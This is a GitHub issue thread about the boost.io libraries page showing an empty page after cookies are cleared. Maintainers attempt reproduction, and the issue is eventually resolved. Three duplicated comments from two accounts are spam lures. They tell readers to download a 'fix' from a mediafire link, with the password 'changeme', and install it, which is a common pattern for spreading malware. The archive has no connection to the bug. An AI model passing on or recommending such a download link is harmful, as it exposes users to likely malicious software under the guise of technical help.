### ISSUE TITLE
Opening library lists with no cookies shows an empty page

### ISSUE THREAD

**Issue by Lastique** [boostorg/website-v2#1208]
0. In the library list on https://www.boost.io, select version 1.85.0 and close the page.
1. In your browser settings, remove cookies for boost.io.
2. Open https://www.boost.io and click on the Libraries link at the top.

In my case, it leads to https://www.boost.io/libraries/?version=boost-1-85-0 (note that the currently latest release is 1.86.0) and presents an empty page:

![Screenshot_20240827_112833](https://github.com/user-attachments/assets/ee713546-74e0-4704-8e99-63b3efd58694)

Kubuntu 22.04, Firefox 129.0.2

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by frankwiles** [comment]
Hmmm I'm not seeing that behavior FYI 

![CleanShot 2024-08-27 at 09 12 23](https://github.com/user-attachments/assets/316e198d-5f91-4c26-9814-0cc2450da87e)

**Comment by Lastique** [comment]
Could this be fixed by @sdarwin, as described in https://github.com/boostorg/website-v2/issues/1084#issuecomment-2312607720?

**Comment by Lastique** [comment]
I'll answer myself: nope, it has just reproduced for me.

**Comment by Lastique** [comment]
I think, the repro I posted may not work because of the changes by @sdarwin I mentioned, but I did reproduce it like this just now:

1. In browser settings, remove cookies for boost.io.
2. Go to https://www.boost.io/ and click on Libraries at the top.
3. In the drop-down list, select version 1.85.0.

As a result, an empty page is shown:

![Screenshot_20240827_171806](https://github.com/user-attachments/assets/4d1c0c31-53aa-4023-b8e4-996db179f6f7)

**Comment by frankwiles** [comment]
Ah @sdarwin I'm guessing my most recent changes related to "latest" aren't in prod yet am I right? If so then yeah it exists on prod but fixed in staging.

**Comment by vinniefalco** [comment]
The points to the larger problem that we can't have a convenient "preview bot" for website pull requests.

**Comment by rbbeeston** [comment]
This appears to be resolved, unable to replicate.
